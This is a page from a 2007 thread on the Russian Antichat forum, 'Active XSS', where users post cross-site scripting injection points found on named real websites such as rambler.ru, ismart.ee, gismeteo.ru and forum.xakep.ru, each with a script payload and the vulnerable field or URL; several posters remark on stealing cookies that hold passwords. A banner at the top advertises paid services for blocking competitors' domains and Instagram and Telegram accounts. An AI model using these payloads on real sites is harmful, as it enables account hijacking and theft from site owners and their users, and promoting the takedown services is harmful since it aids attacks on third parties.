Форум АНТИЧАТ - Активные Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Активные Xss

Страница 4 из 41

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#31

24.04.2007, 21:49

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

http://www.bilandima.ru бррр..противно...

Дневники>Новая Запись> Адрес фотографии >

Код:

 http://"><script>alert(/xss/)</script>

да ещё там в куках..пасс в открытом виде)

#32

24.04.2007, 22:15

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

rambler.ru

В «Планете» -> «Профиль» -> «Контакты»
Уязвимо поле “ICQ 2” и название аватарки.
Куки не стыришь, тк ограничение стоит 22 символа(((

Код:

<img src=javascript:alert()>

Последний раз редактировалось freddi; 01.05.2007 в 19:52..

#33

25.04.2007, 06:45

Horsekiller

Познающий

Регистрация: 22.11.2006

Сообщений: 68

Провел на форуме:
682079

Репутация: 137

http://kemclub.ru/

При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О -

Код:

<script>alert()</script>

,

потом заходим

Код:

http://kemclub.ru/club.php?p=8&srat=1

Находим себя, получаем алерт.

#34

26.04.2007, 09:11

Horsekiller

Познающий

Регистрация: 22.11.2006

Сообщений: 68

Провел на форуме:
682079

Репутация: 137

http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )

При регистарации (

Код:

http://ismart.ee/Books.dll/login?next=index

)
уязвимы поля:
1. E-mail; - вписываем

Код:

qwe@qwe.ru"><script>alert(/xss/)</script>

2. Ваше имя. - вписаваем

Код:

<script>alert(/xss/)</script>

Далее можно изменить приветствие на

Код:

<script>alert(/xss/)</script>

, тоже работает.

Все заказы просматриваются вручную кстати

И напоследок пассивная XSS, хотя это и не так интересно :

Код:

http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Xss на сайте ЦСКА

#35

27.04.2007, 22:48

_GaLs_

Постоянный

Регистрация: 21.04.2006

Сообщений: 540

Провел на форуме:
1310036

Репутация: 726

Отправить сообщение для _GaLs_ с помощью ICQ

Xss на сайте ЦСКА

Сайт http://www.cskabasket.com/

Постим коммент

Код:

<script>alert ();</script>

#36

28.04.2007, 16:04

Morph

Постоянный

Регистрация: 13.08.2004

Сообщений: 957

Провел на форуме:
1770063

Репутация: 429

http://www.yandex.ru/cgi-bin/test-robots?host=morpheg.narod.ru
Хек или не хек?

#37

30.04.2007, 12:04

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

forum.xakep.ru

Запостил сюда тк не понял какой у них тип форума.
На форуме прицепляем файл тхт с содержанием:
"><script>alert()</script>
и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации.
на ие не тестил, он у меня глючит).

#38

01.05.2007, 13:56

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

на ачате слева ссылка $$$ для web-мастеров
http://tak.ru/editing.php
в любом поле нет фильтрации : "><script>alert()</script>

#39

02.05.2007, 20:04

2pick

Познающий

Регистрация: 17.03.2007

Сообщений: 98

Провел на форуме:
193152

Репутация: 45

Отправить сообщение для 2pick с помощью ICQ

http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=r us&title=%3Cscript%3Ealert('Here%20was%202pick');% 3C/script%3E

#40

02.05.2007, 21:16

mr.The

Познавший АНТИЧАТ

Регистрация: 30.04.2007

Сообщений: 1,206

Провел на форуме:
4778940

Репутация: 1257

Отправить сообщение для mr.The с помощью ICQ

Цитата:

http://dyn.gismeteo.ru/cgi-bin/showmap.exe ?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3 Cscript%3Ealert('Here%20was%202pick');%3C/script%3E

это пасивная

Последний раз редактировалось _Great_; 04.06.2007 в 22:04..

Страница 4 из 41

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход